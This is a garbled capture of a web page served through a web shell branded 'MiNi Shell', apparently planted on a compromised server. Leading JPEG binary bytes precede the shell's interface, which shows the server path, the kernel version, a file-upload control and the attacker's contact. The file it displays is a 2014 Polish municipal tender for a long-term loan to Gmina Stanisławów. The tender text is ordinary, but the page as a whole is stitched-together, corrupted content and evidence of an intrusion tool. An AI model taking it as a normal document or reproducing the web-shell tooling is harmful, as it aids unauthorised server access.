JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/201056-N-2014.html

<p class="kh_header"><b>Stanisławów: Udzielenie i obsługa długoterminowego kredytu w kwocie 778 200,00 zł. PLN na spłatę wcześniej zaciągniętych zobowiązań z tytułu kredytów i pożyczek.</b><br>
<b>Numer ogłoszenia: 201056 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stanisławów , Rynek 32, 05-304 Stanisławów, woj. mazowieckie, tel. 025 7575858, faks 025 7575857.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa długoterminowego kredytu w kwocie 778 200,00 zł. PLN na spłatę wcześniej zaciągniętych zobowiązań z tytułu kredytów i pożyczek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest udzielenie i obsługa długoterminowego kredytu w wysokości 778 200 zł. PLN (słownie: siedemset siedemdziesiąt osiem tysięcy dwieście złotych)  na spłatę wcześniej zaciągniętych zobowiązań z tytułu kredytów i pożyczek o których mowa w art. 89 ust. 1 pkt. 3 ustawy z dnia 27 sierpnia 2009r. o finansach publicznych (j.t. Dz. U. z 2013 r. poz. 885 z późn. zm.).

2. Charakterystyka kredytu określonego w pkt. 1:

1) okres kredytowania ustala się na lata 2014 - 2023,
2) okres karencji w spłacie rat do 30.06.2015 r. 
3) realizacja kredytu w następujących transzach i terminach w formie przelewu środków pieniężnych na rachunek budżetu Gminy Stanisławów:
-  I transza 778 200 zł. od dnia 20 lipca 2014 r.
4) spłata rat kapitałowych następować będzie miesięcznie według harmonogramu po okresie karencji :

 1  rata do dnia  31.07.2015 r. w kwocie	6 700 zł.	do kwoty	771 500 zł.
 2  rata do dnia  31.08.2015 r. w kwocie	6 700 zł.	do kwoty	764 800 zł.
 3  rata do dnia  31.10.2015 r. w kwocie	6 700 zł.	do kwoty	758 100 zł.
 4  rata do dnia  31.12.2015 r. w kwocie	6 700 zł.	do kwoty	751 400 zł.
 
 5  rata do dnia  31.01.2016 r. w kwocie	6 400 zł.	do kwoty	745 000 zł.
 6  rata do dnia  29.02.2016 r. w kwocie	6 400 zł.	do kwoty	738 600 zł.
 7  rata do dnia  31.03.2016 r. w kwocie	6 400 zł.	do kwoty	732 200 zł.
 8  rata do dnia  30.04.2016 r. w kwocie	6 400 zł.	do kwoty	725 800 zł.
 9  rata do dnia  31.05.2016 r. w kwocie	6 400 zł.	do kwoty	719 400 zł.
10 rata do dnia  30.06.2016 r. w kwocie	6 400 zł.	do kwoty	713 000 zł.
11 rata do dnia  31.07.2016 r. w kwocie	6 400 zł.	do kwoty	706 600 zł.
12 rata do dnia  31.08.2016 r. w kwocie	6 400 zł.	do kwoty	700 200 zł.
13 rata do dnia  30.09.2016 r. w kwocie	6 400 zł.	do kwoty	693 800 zł.
14 rata do dnia  31.10.2016 r. w kwocie	6 400 zł.	do kwoty	687 400 zł.
15 rata do dnia  30.11.2016 r. w kwocie	6 400 zł.	do kwoty	681 000 zł.
16 rata do dnia  31.12.2016 r. w kwocie	6 400 zł.	do kwoty	674 600 zł.

17  rata do dnia  31.01.2017 r. w kwocie	6 400 zł.	do kwoty	668 200 zł.
18  rata do dnia  28.02.2017 r. w kwocie	6 400 zł.	do kwoty	661 800 zł.
19  rata do dnia  31.03.2017 r. w kwocie	6 400 zł.	do kwoty	655 400 zł.
20  rata do dnia  30.04.2017 r. w kwocie	6 400 zł.	do kwoty	649 000 zł.
21  rata do dnia  31.05.2017 r. w kwocie	6 400 zł.	do kwoty	642 600 zł.
22  rata do dnia  30.06.2017 r. w kwocie	6 400 zł.	do kwoty	636 200 zł.
23  rata do dnia  31.07.2017 r. w kwocie	6 400 zł.	do kwoty	629 800 zł.
24  rata do dnia  31.08.2017 r. w kwocie	6 400 zł.	do kwoty	623 400 zł.
25  rata do dnia  30.09.2017 r. w kwocie	6 400 zł.	do kwoty	617 000 zł.
26  rata do dnia  31.10.2017 r. w kwocie	6 400 zł.	do kwoty	610 600 zł.
27  rata do dnia  30.11.2017 r. w kwocie	6 400 zł.	do kwoty	604 200 zł.
28  rata do dnia  31.12.2017 r. w kwocie	6 400 zł.	do kwoty	597 800 zł.

29  rata do dnia  31.01.2018 r. w kwocie	6 400 zł.	do kwoty	591 400 zł.
30  rata do dnia  28.02.2018 r. w kwocie	6 400 zł.	do kwoty	585 000 zł.
31  rata do dnia  31.03.2018 r. w kwocie	6 400 zł.	do kwoty	578 600 zł.
32  rata do dnia  30.04.2018 r. w kwocie	6 400 zł.	do kwoty	572 200 zł.
33  rata do dnia  31.05.2018 r. w kwocie	6 400 zł.	do kwoty	565 800 zł.
34  rata do dnia  30.06.2018 r. w kwocie	6 400 zł.	do kwoty	559 400 zł.
35  rata do dnia  31.07.2018 r. w kwocie	6 400 zł.	do kwoty	553 000 zł.
36  rata do dnia  31.08.2018 r. w kwocie	6 400 zł.	do kwoty	546 600 zł.
37  rata do dnia  30.09.2018 r. w kwocie	6 400 zł.	do kwoty	540 200 zł.
38  rata do dnia  31.10.2018 r. w kwocie	6 400 zł.	do kwoty	533 800 zł.
39  rata do dnia  30.11.2018 r. w kwocie	6 400 zł.	do kwoty	527 400 zł.
40  rata do dnia  31.12.2018 r. w kwocie	6 400 zł.	do kwoty	521 000 zł.

41  rata do dnia  31.01.2019 r. w kwocie	6 400 zł.	do kwoty	514 600 zł.
42  rata do dnia  28.02.2019 r. w kwocie	6 400 zł.	do kwoty	508 200 zł.
43  rata do dnia  31.03.2019 r. w kwocie	6 400 zł.	do kwoty	501 800 zł.
44  rata do dnia  30.04.2019 r. w kwocie	6 400 zł.	do kwoty	495 400 zł.
45  rata do dnia  31.05.2019 r. w kwocie	6 400 zł.	do kwoty	489 000 zł.
46  rata do dnia  30.06.2019 r. w kwocie	6 400 zł.	do kwoty	482 600 zł.
47  rata do dnia  31.07.2019 r. w kwocie	6 400 zł.	do kwoty	476 200 zł.
48  rata do dnia  31.08.2019 r. w kwocie	6 400 zł.	do kwoty	469 800 zł.
49  rata do dnia  30.09.2019 r. w kwocie	6 400 zł.	do kwoty	463 400 zł.
50  rata do dnia  31.10.2019 r. w kwocie	6 400 zł.	do kwoty	457 000 zł.
51  rata do dnia  30.11.2019 r. w kwocie	6 400 zł.	do kwoty	450 600 zł.
52  rata do dnia  31.12.2019 r. w kwocie	6 400 zł.	do kwoty	444 200 zł.
 
53  rata do dnia  31.01.2020 r. w kwocie	7 400 zł.	do kwoty	436 800 zł.
54  rata do dnia  29.02.2020 r. w kwocie	7 400 zł.	do kwoty	429 400 zł.
55  rata do dnia  31.03.2020 r. w kwocie	7 400 zł.	do kwoty	422 000 zł.
56  rata do dnia  30.04.2020 r. w kwocie	7 400 zł.	do kwoty	414 600 zł.
57  rata do dnia  31.05.2020 r. w kwocie	7 400 zł.	do kwoty	407 200 zł.
58  rata do dnia  30.06.2020 r. w kwocie	7 400 zł.	do kwoty	399 800 zł.
59  rata do dnia  31.07.2020 r. w kwocie	7 400 zł.	do kwoty	392 400 zł.
60  rata do dnia  31.08.2020 r. w kwocie	7 400 zł.	do kwoty	385 000 zł.
61  rata do dnia  30.09.2020 r. w kwocie	7 400 zł.	do kwoty	377 600 zł.
62  rata do dnia  31.10.2020 r. w kwocie	7 400 zł.	do kwoty	370 200 zł.
63  rata do dnia  30.11.2020 r. w kwocie	7 400 zł.	do kwoty	362 800 zł.
64  rata do dnia  31.12.2020 r. w kwocie	7 400 zł.	do kwoty	355 400 zł.

65  rata do dnia  31.01.2021 r. w kwocie	7 400 zł.	do kwoty	348 000 zł.
66  rata do dnia  28.02.2021 r. w kwocie	7 400 zł.	do kwoty	340 600 zł.
67  rata do dnia  31.03.2021 r. w kwocie	7 400 zł.	do kwoty	333 200 zł.
68  rata do dnia  30.04.2021 r. w kwocie	7 400 zł.	do kwoty	325 800 zł.
69  rata do dnia  31.05.2021 r. w kwocie	7 400 zł.	do kwoty	318 400 zł.
70  rata do dnia  30.06.2021 r. w kwocie	7 400 zł.	do kwoty	311 000 zł.
71  rata do dnia  31.07.2021 r. w kwocie	7 400 zł.	do kwoty	303 600 zł.
72  rata do dnia  31.08.2021 r. w kwocie	7 400 zł.	do kwoty	296 200 zł.
73  rata do dnia  30.09.2021 r. w kwocie	7 400 zł.	do kwoty	288 800 zł.
74  rata do dnia  31.10.2021 r. w kwocie	7 400 zł.	do kwoty	281 400 zł.
75  rata do dnia  30.11.2021 r. w kwocie	7 400 zł.	do kwoty	274 000 zł.
76  rata do dnia  31.12.2021 r. w kwocie	7 400 zł.	do kwoty	266 600 zł.

77  rata do dnia  31.01.2022 r. w kwocie	10 000 zł.	do kwoty	256 600 zł.
78  rata do dnia  28.02.2022 r. w kwocie	10 000 zł.	do kwoty	246 600 zł.
79  rata do dnia  31.03.2022 r. w kwocie	10 000 zł.	do kwoty	236 600 zł.
80  rata do dnia  30.04.2022 r. w kwocie	10 000 zł.	do kwoty	226 600 zł.
81  rata do dnia  31.05.2022 r. w kwocie	10 000 zł.	do kwoty	216 600 zł.
82  rata do dnia  30.06.2022 r. w kwocie	10 000 zł.	do kwoty	206 600 zł.
83  rata do dnia  31.07.2022 r. w kwocie	10 000 zł.	do kwoty	196 600 zł.
84  rata do dnia  31.08.2022 r. w kwocie	10 000 zł.	do kwoty	186 600 zł.
85  rata do dnia  30.09.2022 r. w kwocie	10 000 zł.	do kwoty	176 600 zł.
86  rata do dnia  31.10.2022 r. w kwocie	10 000 zł.	do kwoty	166 600 zł.
87  rata do dnia  30.11.2022 r. w kwocie	10 000 zł.	do kwoty	156 600 zł.
88  rata do dnia  31.12.2022 r. w kwocie	10 000 zł.	do kwoty	146 600 zł.

89  rata do dnia  31.01.2023 r. w kwocie	12 216 zł.	do kwoty	134 384 zł.
90  rata do dnia  28.02.2023 r. w kwocie	12 216 zł.	do kwoty	122 168 zł.
91  rata do dnia  31.03.2023 r. w kwocie	12 216 zł.	do kwoty	109 952 zł.
92  rata do dnia  30.04.2023 r. w kwocie	12 216 zł.	do kwoty	  97 736 zł.
93  rata do dnia  31.05.2023 r. w kwocie	12 216 zł.	do kwoty	  85 520 zł.
94  rata do dnia  30.06.2023 r. w kwocie	12 216 zł.	do kwoty	  73 304 zł.
95  rata do dnia  31.07.2023 r. w kwocie	12 216 zł.	do kwoty	  61 088 zł.
96  rata do dnia  31.08.2023 r. w kwocie	12 216 zł.	do kwoty	  48 872 zł.
97  rata do dnia  30.09.2023 r. w kwocie	12 216 zł.	do kwoty	  36 656 zł.
98  rata do dnia  31.10.2023 r. w kwocie	12 216 zł.	do kwoty	  24 440 zł.
99  rata do dnia  30.11.2023 r. w kwocie	12 216 zł.	do kwoty	  12 224 zł.
100 rata do dnia  31.12.2023 r. w kwocie	12 224 zł.	do kwoty	           0 zł.
	  

5) spłata odsetek następować będzie w okresach miesięcznych na podstawie zawiadomienia z banku o wysokości naliczonych odsetek w terminie 7 dni przed datą płatności. Termin rozpoczęcia spłaty odsetek ustala się na dzień   31.07. 2014 r. 
6) płatność rat i odsetek będzie realizowana w ostatnim dniu danego miesiąca z tym, że jeśli będzie to dzień wolny od pracy ,to płatność nastąpi w dniu roboczym   poprzedzającym ten dzień, 
7) oprocentowanie kredytu oparte o zmienną stawkę WIBOR 1 M ogłaszanej  dla ostatniego dnia roboczego miesiąca poprzedzającego okres obrachunkowy, skorygowanej o marżę banku , 
8) dzień podpisania umowy będzie dniem postawienia kredytu do dyspozycji zamawiającego w terminach i transzach dostosowanych do potrzeb zamawiającego, 
9) kredyt nie będzie obciążony innymi opłatami niż wymienione w SIWZ.
10) kredytobiorcy będzie przysługiwać prawo do wcześniejszej spłaty kredytu bez dodatkowych kosztów.
11) wartość wszystkich prowizji od udzielonego kredytu wyniesie  0%.
12) zabezpieczeniem spłaty kredytu będzie weksel własny in blanco wraz z deklaracją wekslową.
Dla celów przygotowania wyceny oferty, Wykonawcy uczestniczący w niniejszym postępowaniu przyjmą stawkę WIBOR 1M z dnia 04.06.2014 r. tj. 2,62 %  oraz stałą marżę banku w całym okresie kredytowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2023.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest złożyć oświadczenie - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest złożyć oświadczenie - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest złożyć oświadczenie - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest złożyć oświadczenie - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest złożyć oświadczenie - załącznik do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)wypis z rejestru handlowego oraz ewentualne zaświadczenia o wpisie do ewidencji działalności gospodarczej lub zezwolenie Prezesa NBP na wykonywanie czynności bankowych,
b) oświadczenie o niepodleganiu wykluczeniu z postępowania na mocy art. 24 
i spełnianiu warunków art. 22 ustawy Prawo zamówień publicznych (załącznik do siwz) oraz koncesję, zezwolenie lub licencję;
c) wzór wniosku o wypłatę  kredytu;
d) pełnomocnictwo - w przypadku gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
e) projekt umowy kredytowej
f) lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 z późn. zm.) lub informację o tym, Ze Wykonawca nie należy do grupy kapitałowej - wg załącznika do siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zamawiający informuje, że przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z wymienionych poniżej okoliczności, z uwzględnieniem podanych warunków do ich wprowadzenia:
a) Zamawiający zastrzega sobie prawo do złożenia oświadczenia o rezygnacji z części wykorzystania kredytu bez ponoszenia dodatkowych opłat, w przypadku poprawy sytuacji finansowej kredytobiorcy. W takim przypadku wykonawca nie będzie pobierał żadnych innych opłat od niewykorzystanej części kredytu,
b) Kredytobiorca zastrzega sobie możliwość wcześniejszej spłaty całości lub części kredytu bez ponoszenia dodatkowych  prowizji i opłat, w przypadku poprawy sytuacji  finansowej kredytobiorcy,
c) zmianie mogą ulec ilości, terminy oraz wysokości transz w zależności od sytuacji finansowej kredytobiorcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stanislawow.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy ul. Rynek 32, 05-304 Stanisławów, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2014 godzina 11:30, miejsce: Urząd Gminy ul. Rynek 32, 05-304 Stanisławów, pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com